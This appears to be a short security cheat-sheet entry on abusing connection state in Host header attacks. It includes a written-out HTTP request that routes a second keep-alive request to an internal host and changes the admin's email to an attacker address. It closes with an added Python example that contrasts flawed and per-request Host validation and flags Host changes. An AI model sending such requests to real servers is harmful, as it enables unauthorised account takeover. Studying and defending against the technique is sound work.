Host Header Attack
- [exploiting](https://portswigger.net/web-security/host-header/exploiting)
Abuse Connection State
If the web server validates the Host header only on the first request of a connection, we may be able to exploit the second request by keeping the connection open and changing its Host header to point at the internal page.
1. Send the First Request
2. Send the Second Request

```
POST /admin/change-email HTTP/2
Host: 192.168.0.1

email=admin@example.com&new_email_1=attacker@evil.com&new_email_2=attacker@evil.com
```
As a result, we may be able to change the admin's email to an arbitrary address.
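The root cause is a front end that trusts a connection after its first request. The following added example (not from the original page) models that flawed check beside a per-request check, and flags a Host change on a reused connection for logging. The allowed hostname `shop.example.com`, the function names and the sample connection are assumptions constructed for illustration.

```python
# Added example: Host validation on a reused (keep-alive) connection.
ALLOWED_HOSTS = {"shop.example.com"}  # assumed public virtual host (constructed)

# Constructed sample: two requests sent over one connection.
CONNECTION = [
    {"method": "GET", "path": "/", "host": "shop.example.com"},
    {"method": "POST", "path": "/admin/change-email", "host": "192.168.0.1"},
]

def normalize_host(value):
    """Lower-case the Host value and drop an optional :port."""
    host = value.strip().lower()
    if host.startswith("["):              # IPv6 literal such as [::1]:8080
        return host.split("]")[0] + "]"
    return host.split(":")[0]

def route_first_request_only(requests):
    """Flawed model: only the first Host on the connection is checked."""
    decisions = []
    for index, req in enumerate(requests):
        if index == 0 and normalize_host(req["host"]) not in ALLOWED_HOSTS:
            return ["reject"]             # connection closed immediately
        decisions.append("forward")       # later requests are never re-checked
    return decisions

def route_every_request(requests):
    """Hardened model: every request is checked against the allowlist."""
    decisions = []
    for req in requests:
        if normalize_host(req["host"]) in ALLOWED_HOSTS:
            decisions.append("forward")
        else:
            decisions.append("reject")
            break                         # drop the connection on first failure
    return decisions

def host_changes(requests):
    """Return indexes of requests whose Host differs from the first one
    on the same connection, which is worth logging and alerting on."""
    first = normalize_host(requests[0]["host"])
    return [i for i, req in enumerate(requests)
            if normalize_host(req["host"]) != first]

if __name__ == "__main__":
    print("first-request-only:", route_first_request_only(CONNECTION))
    print("every-request:     ", route_every_request(CONNECTION))
    print("host changed at:   ", host_changes(CONNECTION))
```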